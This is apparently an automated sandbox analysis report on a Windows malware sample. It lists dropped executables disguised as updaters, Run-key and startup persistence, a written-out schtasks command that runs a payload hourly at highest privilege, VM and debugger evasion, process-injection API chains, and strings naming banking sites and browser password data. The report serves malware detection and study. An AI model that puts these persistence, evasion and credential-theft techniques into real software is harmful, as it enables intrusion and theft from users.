Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007080D4 push 3CDC3E98h; mov dword ptr [esp], edi 0_2_008F508D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007090BA push 6BAD0365h; mov dword ptr [esp], esi 0_2_008E3715
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007090BA push eax; mov dword ptr [esp], 6FBB81C3h 0_2_008E3803
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007040BB push 33109B05h; mov dword ptr [esp], edx 0_2_008FA131
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007040BB push 5D0E68DBh; mov dword ptr [esp], edx 0_2_008FA1C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007040BB push 670C21C9h; mov dword ptr [esp], ebp 0_2_008FA1DB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007040BB push 4B9FE2C1h; mov dword ptr [esp], ecx 0_2_008FA21B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702098 push 64A594B0h; mov dword ptr [esp], ecx 0_2_008F2E35
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702098 push edi; mov dword ptr [esp], esi 0_2_008F2E5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702098 push 22266561h; mov dword ptr [esp], ebp 0_2_008F2E87
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00700176 push eax; mov dword ptr [esp], 00000004h 0_2_008EB281
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00700176 push eax; mov dword ptr [esp], esi 0_2_008EB2EF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00700176 push 18B1E7D9h; mov dword ptr [esp], ebx 0_2_008EB382
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00700176 push edi; mov dword ptr [esp], edx 0_2_008EB3BE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00708167 push 1F83EE5Ah; mov dword ptr [esp], esp 0_2_008E2C6E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00708167 push ebp; mov dword ptr [esp], esi 0_2_008E2C94
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704157 push ebp; mov dword ptr [esp], 000AA975h 0_2_008E1AC2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702158 push ebp; mov dword ptr [esp], 67CCA1B0h 0_2_008E0A96
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702158 push 03068F7Dh; mov dword ptr [esp], ebx 0_2_008E0AEC
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\l2[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\k[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe
Source: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c
Source: C:\Users\user\Desktop\file.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00481A30 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00481A30
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063EC230 CreateThread,Sleep, call eax 0_2_063EC230
Source: C:\Users\user\Desktop\file.exe Sandbox detection routine: GetCursorPos, DecisionNode, Sleep
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\Desktop\file.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: GetCursorPos,GetCursorPos,GetCursorPos,Sleep,GetCursorPos,Sleep,GetCursorPos, 0_2_0045D9F0
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 7709
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1444
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Window / User API: threadDelayed 9995
Source: C:\Users\user\Desktop\file.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Users\user\Desktop\file.exe TID: 1292 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5864 Thread sleep time: -984000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 1292 Thread sleep time: -7709000s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5864 Thread sleep time: -4332000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 4392 Thread sleep count: 9995 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 4392 Thread sleep time: -2248875s >= -30000s
Source: C:\Users\user\Desktop\file.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004DB1CB FindFirstFileExW,GetLastError, 0_2_004DB1CB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B300 FindFirstFileA,FindNextFileA,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 0_2_0040B300
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063CB2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError, 0_2_063CB2C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06402EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_06402EAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0641CCFD FindFirstFileExW, 0_2_0641CCFD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06426276 VirtualQuery,GetSystemInfo, 0_2_06426276
Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 30000
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696@
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000002.4548516421.0000000005D30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B46CC078
Source: file.exe, 00000000.00000002.4548751165.0000000005F5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}5o
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ra Change Transaction PasswordVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000003.3589404399.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4545138703.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000003.2336812668.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000002.4545138703.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ebrokers.co.inVMware20,11696487552d
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .comVMware20,11696487
Source: file.exe, 00000000.00000003.2278727954.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2286552922.0000000002A60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__=l{TW
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nickname.utiitsl.comVMware20,11696487550
Source: file.exe, 00000000.00000002.4548516421.0000000005D30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}P
Source: file.exe, 00000000.00000003.3589404399.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4546972103.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWiN
Source: file.exe, 00000000.00000003.2399271235.0000000005D6C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B46CC078*
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000002.4546972103.0000000000F21000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000003.2336812668.0000000000EB9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,116
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000002.4548751165.0000000005F30000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&0000001.19041.2006_none_d94bc80de1097097\gdiplus.dll
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: billing_address_id.comVMware20,11696487
Source: file.exe, 00000000.00000003.2250524948.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2242387737.0000000002A60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__=l{TW
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: file.exe, 00000000.00000003.2389362003.0000000005D75000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .utiitsl.comVMware20,11696487550
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000003.2258745532.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2267558623.0000000002A60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.2294313149.0000000002A60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \SystemRoot\system32\ntkrnlm.exeSDT\VBOX__=l{TW
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: 4tSPFpXQutr4Web Data.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06401780 GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW, 0_2_06401780
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418BB0 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 0_2_00418BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004160B0 mov ecx, dword ptr fs:[00000030h] 0_2_004160B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004146B0 mov eax, dword ptr fs:[00000030h] 0_2_004146B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0045D9F0 mov eax, dword ptr fs:[00000030h] 0_2_0045D9F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0045D9F0 mov eax, dword ptr fs:[00000030h] 0_2_0045D9F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041AB90 mov eax, dword ptr fs:[00000030h] 0_2_0041AB90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004094C0 OutputDebugStringA,GetModuleHandleA,GetProcAddress,GetProcessHeap,RtlAllocateHeap,HeapFree,RtlAllocateHeap,HeapFree, 0_2_004094C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_064062B6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_064062B6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06406014 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_06406014
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0640FC07 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0640FC07

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418BB0 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread, 0_2_00418BB0
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe "C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\VkHLTH_m2kErRb6vpA5n.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe "C:\Users\user\AppData\Local\Temp\heidiaXLeM4rqVSWS\IQUKpYR1BFFsqw1YWBOv.exe"
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06405D6C cpuid 0_2_06405D6C
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_06420227
Source: C:\Users\user\Desktop\file.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_064202FD
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_06415047
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_06420121
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW, 0_2_0641FFF8
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0641FC7F
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0641FC34
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoEx,FormatMessageA, 0_2_06402CC6
Source: C:\Users\user\Desktop\file.exe Code function: EnumSystemLocalesW, 0_2_0641FD1A
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_0641FDA5
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004DC84D GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_004DC84D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063EC990 SetThreadExecutionState,SetThreadExecutionState,GetVersion,GetCurrentThreadId,GetThreadDesktop,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GdiplusStartup,CreateThread,CloseHandle, 0_2_063EC990
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 35.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 42.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.IQUKpYR1BFFsqw1YWBOv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.VkHLTH_m2kErRb6vpA5n.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.4548516421.0000000005D60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 1432, type: MEMORYSTR
